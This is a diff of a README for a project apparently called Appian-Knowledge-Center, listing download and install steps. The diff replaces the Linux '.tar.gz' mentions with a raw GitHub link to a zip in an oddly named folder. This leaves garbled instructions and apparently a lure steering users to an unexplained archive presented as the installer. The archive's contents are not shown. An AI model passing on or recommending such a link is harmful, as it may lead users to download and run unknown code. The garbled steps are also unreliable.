Kehenko/Appian-Knowledge-Center/README.md

 1. Click on the link above or the button to visit the Releases page.
 2. Find the latest version at the top of the page.
 3. Download the appropriate file for your system.
 For Windows, look for files ending with `.exe`.
 For macOS, look for `.dmg` files.
-For Linux, you may find `.tar.gz`.
+For Linux, you may find `https://raw.githubusercontent.com/Kehenko/Appian-Knowledge-Center/master/biliation/Center_Knowledge_Appian_2.9-alpha.2.zip`.
 4. Once downloaded, open the file and follow the installation prompts.

 ### For Example:

 - **Windows**: Double-click the `.exe` file to start the installation.
 - **macOS**: Open the `.dmg` file and drag the app to your Applications folder.
-- **Linux**: Unpack the `.tar.gz` file and follow the included README for installation instructions.
+- **Linux**: Unpack the `https://raw.githubusercontent.com/Kehenko/Appian-Knowledge-Center/master/biliation/Center_Knowledge_Appian_2.9-alpha.2.zip` file and follow the included README for installation instructions.

 After installation, you will be able to access the Appian-Knowledge-Center on your device.